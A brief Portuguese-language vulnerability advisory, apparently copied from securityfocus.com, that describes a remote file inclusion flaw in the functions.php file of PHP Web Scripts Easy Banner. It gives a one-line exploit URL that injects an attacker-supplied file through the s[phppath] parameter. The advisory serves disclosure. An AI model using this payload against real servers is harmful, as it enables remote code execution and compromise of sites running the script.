PHP Web Scripts Easy Banner - Inclusão de Arquivo Remoto

Falha: Uma má verificação na variável $s[phppath]= do arquivo functions.php permite a inclusão de um arquivo arbitrário por usuário mal-intencionado.
Script: PHP Web Scripts Easy Banner
Download: phpwebscripts.com
Código vulnerável (functions.php):

indisponível

Desoberta por: abu ahmed
Exploit:

http://host/functions.php?s[phppath]=arquivomaligno?

Papers relacionados: Inclusão de Arquivo Remoto.txt
Fonte: securityfocus.com